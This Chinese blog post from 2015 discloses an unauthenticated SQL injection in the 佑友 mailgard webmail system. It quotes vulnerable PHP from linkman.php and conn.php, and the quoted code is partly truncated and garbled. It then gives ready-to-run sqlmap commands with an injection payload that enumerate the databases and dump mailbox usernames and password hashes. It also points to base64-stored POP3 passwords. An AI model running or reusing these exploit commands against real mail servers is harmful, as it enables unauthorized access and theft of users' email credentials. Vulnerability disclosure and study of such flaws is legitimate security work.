IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    佑友mailgard webmail无需登录的SQL注射一枚

    没穿底裤发表于 2015-06-07 16:43:00
    love 0

    ./sync/linkman.php里面有明显的SQL注射($group_id),代码如下

    由于没有包含global.php所以全局过滤无效并且不需要登录即可访问,如果未开启magic_quotes_gpc则可注入(系统默认关闭magic_quotes_gpc)

    ".$rs['group_id']."".$rs['group_name']."";
		$sqlg = "SELECT * FROM `groups` WHERE `fid`='".$rs['group_id']."' ".$query;
		$resg = mysql_query($sqlg);
		if($rsg = mysql_fetch_array($resg)){
			outputUsers($export_range,$rs['group_id'],$part+1);
		}
		// 列出此组下联系人
		$sqll = "SELECT * FROM `linkman` WHERE `group_id`='".$rs['group_id']."' $query2 ORDER BY convert(`name` using GBK) ";
		$resl = mysql_query($sqll);
		while ($rsl=mysql_fetch_array ($resl)) {
			echo "
				".$rsl['mail_addr']."
				".$rsl['name']."
				";
		}
		echo "";
	}
}
$group_id = $_POST['group_id'] ? $_POST['group_id'] : $_GET['group_id'];
$export_range = $_POST['export_range'] ? $_POST['export_range'] : $_GET['export_range'];
echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';
echo '';
echo '';
outputUsers('public');
echo '';
echo '';
outputUsers();
echo '';
echo '';
?>

    看下它包含的conn.php代码,注入一样很明显($name和$token)
    由于没有包含global.php所以全局过滤无效并且不需要登录即可访问,如果未开启magic_quotes_gpc则可注入(系统默认关闭magic_quotes_gpc)

    =3) {
				mysql_query("UPDATE `define_para` SET `trydate`=".time()." WHERE `user_name`='$name'  ");
				setError('Try too frequently, please try again after two minutes');
			}else{
				if($row['password'] != crypt($token,$row["password"])){
					$sql = "SELECT * FROM `define_para` WHERE `user_name`='$name' ";
					$result = mysql_query($sql);
					if($rs = mysql_fetch_array($result)) {
						if(time()-$rs['trydate']<120) {
							$rs['trytimes']++;
							mysql_query("UPDATE `define_para` SET `trytimes`=`trytimes`+1 WHERE `user_name`='$name'  ");
						}else{
							$rs['trytimes'] = 1;
							mysql_query("UPDATE `define_para` SET `trydate`='".time()."',`trytimes`=1 WHERE `user_name`='$name'  ");
						}
					}
					if( (3-$rs['trytimes'])>0 ){
						setError(sprintf('Login fails, you can try %d times', (3-$rs['trytimes'])));
					}else{
						setError('Try too frequently, please try again after two minutes');
					}
				}
			}
		}
	}
}

function setError($msg){

	echo '<'.'?xml version="1.0" encoding="utf-8"?'.'>';

	echo "$msg";

	exit;

}

?>

    系统的逻辑是先运行conn.php的代码校验身份,再运行linkman.php的代码
    所以我们要搞注入,得从conn.php入手
    上sqlmap:

    sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token;=1" --dbms=mysql --technique=B --dbs --threads=5

    邮箱帐号密码在hicommail.mailbox里,sqlmap可直接dump:

    sqlmap -u "http://mail.domain.com:889/sync/conn.php?name=admin' or '1'='1 *&token;=1" --dbms=mysql --technique=B --threads=5 -D hicommail -T mailbox -C username,password --dump

    5

    b
    密码加密类型为php crypt($password,$md5salt),例如$1$08ab2d3c$G1Q/PyedrHxQdfGXOmga0/,这种类型爆破需要时间
    不过另外有个表(hicommail.popmanage)保存了少量POP3明文密码,base64编码的,在这里为了保护用户就不贴出来了



沪ICP备19023445号-2号
友情链接